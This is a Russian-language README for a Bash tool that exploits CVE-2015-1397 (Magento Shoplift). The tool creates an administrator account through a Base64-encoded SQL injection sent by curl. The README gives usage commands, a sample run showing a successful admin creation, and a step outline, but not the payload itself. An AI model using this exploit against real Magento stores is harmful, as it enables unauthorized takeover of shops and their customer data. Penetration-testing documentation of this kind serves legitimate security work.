
Bash-скрипт, эксплуатирующий уязвимость CVE-2015-1397 (Magento Shoplift) для создания пользователя-администратора через SQL-инъекцию. Включает запрос учетных данных, кодирование Base64 и обработку ошибок для тестирования на проникновение и обучения.
Этот скрипт эксплуатирует уязвимость CVE-2015-1397 в Magento, широко известную как эксплойт Magento Shoplift. Он позволяет атакующему создать нового администратора в базе данных Magento путем внедрения SQL-пейлоадов.
Первоначально написан на Python Manish Kishan Tanwar (error1046), эта версия была переписана на Bash с удобными интерактивными запросами на ввод учётных данных автором Divine Clown (0xDTC).
bash, curl и base64.chmod +x CVE-2015-1397
./CVE-2015-1397
http://target.com/).┌──(kali㉿kali)-[~/example]
└─$ ./CVE-2015-1397
Enter the target URL (e.g., http://target.com/): http://example.com/
Enter the new admin username: admin123
Enter the new admin password: pass123
[*] Sending payload to http://example.com/admin/Cms_Wysiwyg/directive/index/
[+] Exploit successful. Admin account created: admin123 / pass123
Проверка входных данных:
http:// или https://.Построение пейлоада:
___directive, закодированный в Base64, содержащий SQL-запрос для вставки нового администратора.Эксплуатация:
POST-запрос к уязвимой конечной точке с помощью curl.Обработка ответа:
http:// или https://.Этот скрипт предназначен только для образовательных целей. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным и неэтичным. Автор и участники не несут ответственности за любое неправомерное использование этого инструмента.
Особая благодарность: